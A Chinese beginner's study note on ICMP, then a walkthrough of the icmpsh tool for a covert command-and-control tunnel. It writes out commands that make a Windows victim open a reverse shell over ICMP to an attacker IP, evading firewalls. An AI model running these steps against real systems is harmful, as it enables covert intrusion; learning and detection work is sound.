纯纯菜鸟的学习记录,如有错误还请纠正

先来了解一下ICMP协议吧

ICMP用来传递差错,控制,查询等信息,在网络层,由于IP协议不可靠,就有了ICMP协议,由于网络探测,路由追踪与回馈


ICMP报文类型:


不可达类型的代码字段常用取值:


超时报文代码字段常用取值:


报文格式:

参考于https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187


隐藏c2隧道之icmpsh

原理:进行隐蔽传输时,攻击端把要执行的命令隐藏在ICMP_ECHO数据包中,肉鸡接收数据包,解出命令并在防火墙内部主机上执行再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端

利用关键点:数据部分

下图是ping,然后wireshark抓的ICMP包

ps:ICMP报文是由系统内核处理,不用占用任何端口 (一般通信要端口,比如你访问一个网站[80端口],本机会随机生成一个大于1023的端口去访问)


工具:icmpsh 处理畸形ping数据

受攻击必须是Windows,,,

1.下载:

git clone https://github.com/inquisb/icmpsh.git

2.关闭ping回复,防止内核自己对ping包回应,刷屏

sysctl -w net.ipv4.icmp_echo_ignore_all=1 #关闭ping回复,0开启

3.安装环境

git clone https://github.com/SecureAuthCorp/impacket.git #失败的话试试直接连接物理网络

cd impacket

sudo python setup.py install

攻击端:

cd icmpsh

./icmpsh_m.py <attacker’ s-ip> 受攻击方 #命令

受攻击机方命令

icmpsh.exe -t <attacker’ s-ip>


执行whoami

ok我们来看看 ICMP数据包(数据包太多了,不停止抓包,数据包一直有,wireshark太强了) data部分就是whoami

学习于漏洞银行

隐藏c2隧道---ICMP之icmpsh的使用相关推荐

  1. ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术

    hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...

  2. 第三章 隐藏通信隧道技术

    第三章 隐藏通信隧道技术 3.1 隐藏通信隧道基础知识 3.1.1 隐藏通信隧道概述 什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异 ...

  3. 内网渗透之隐藏通信隧道

    前言 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断. 那么什么是隧道呢?隧道就是一种绕过端口屏蔽的通信方式.防火墙两端的数 ...

  4. DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用

    DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用 OSI 七层模型 物链网传会表应 常用的隧道技术: (1)网络层:IPv6隧道.ICMP隧道.GRE隧道 (2)传输层:TCP隧道.UDP隧 ...

  5. 内网渗透测试:隐藏通讯隧道技术(上)

    什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断.那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式. ...

  6. 内网安全 隐藏通信隧道技术——应用层.(遨游于 内网任何主机)

    隐藏通信隧道技术. 隐藏通信隧道就是一种 绕过端口屏蔽的通信方式.防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信.当被封装的数据包到达目的地时,将数据包 ...

  7. 内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)

    隐藏通信隧道技术. 隐藏通信隧道就是一种 绕过端口屏蔽的通信方式.防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信.当被封装的数据包到达目的地时,将数据包 ...

  8. 隐藏你的C2(使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)

    文章目录 隐藏C2 CDN域前置 CDN 访问流程 配置CDN 效果 隐藏C2 配置CS Profile 上线CS 总结 iptables保护C2 流量转发 修改默认端口 推荐阅读 之前有一篇文章写过 ...

  9. 【红队APT】反朔源隐藏C2项目CDN域前置云函数数据中转DNS转发

    文章目录 域前置-CDN隐藏C2真实IP 防止被溯源 什么是域前置 条件 原理 ==完整复现== 域前置溯源 DNS协议-域名记录解析 云函数-腾讯云操作 云函数如何溯源 端口转发-Iptables ...

最新文章

  1. python代码根据时间获取周数(week of the year)
  2. 静态自动检查代码缺陷与隐患
  3. oracle在线sql数据库设计,一款在线ER模型设计工具,支持MySQL、SQLServer、Oracle、Postgresql...
  4. IOS之学习笔记六(可变形参)
  5. 中怎样载入选区_PS----关于选区的选取
  6. 使用 Item,ItemManager 在 XNA 中创建物品和道具(十六)
  7. 【李宏毅2020 ML/DL】P12 Brief Introduction of Deep Learning
  8. 如何插入电子签名_如何在电子文档上签名?可靠电子签名的特征有哪些?
  9. [CF1137E]Train Car Selection[维护凸壳]
  10. WINDOWS BAT的命令,双引号位置要注意
  11. ppt设置外观样式_PPT中设置视频外观样式的方法
  12. 企业级飞速低代码开发平台 | 产品介绍 | APass平台 | 全场景适用
  13. cesiumlab v3.0.2—通用模型切片
  14. 公交查询系统Android源代码,公交查询源码
  15. 【React】React全家桶(八)React Router 6
  16. 十分钟搭建私有化人脸识别服务
  17. 北方工业大学计算机专硕分数线,北方工业大学法硕:近三年分数线汇总,一分钟速了解详细...
  18. 搞大事! EABM社区和众多大牌经纪商强强联手合作
  19. win10怎么打开电脑前面板耳机
  20. 小e和siri_小E VS siri ?谁更智能?

热门文章

  1. 有哪些音频转文字的软件可以批量操作?
  2. C/C++家族族谱管理系统
  3. STM32学习笔记(1)——概念扫盲
  4. 结构体类型与结构体变量
  5. HTML提供模板供用户编辑,[html模板制作.ppt
  6. 【狮子数学】05极限的计算——数列极限的计算
  7. 基于asp.net的社区人口信息管理系统
  8. mysql+清理undo_undo清理 redo 持久化
  9. Blink编译及使用
  10. python中英文字母算什么类_python英语